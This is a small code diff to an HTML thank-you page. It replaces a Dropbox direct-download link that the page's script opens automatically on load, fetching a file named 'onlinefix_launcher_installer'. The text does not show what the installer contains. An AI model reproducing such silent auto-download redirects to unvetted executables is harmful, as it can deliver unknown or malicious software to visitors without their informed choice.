--- a/pages/ofmeThanks.html
+++ b/pages/ofmeThanks.html
@@ -90,7 +90,7 @@
         </div>
     </div>
     <script>
-        window.location.href = "https://www.dropbox.com/scl/fi/9cn5vl4v0kozhs9ldq5ho/onlinefix_launcher_installer?rlkey=vcbgtyn5qj98p4v6o3l4322zc&st=sk6xb0yt&dl=1";
+        window.location.href = "https://www.dropbox.com/scl/fi/3woea0w9r6uzwwmv6td3f/onlinefix_launcher_installer?rlkey=bx5467me5gz8e6tfbdu42h2rn&st=oqk60drv&dl=1";
     </script>
 </body>
 </html>
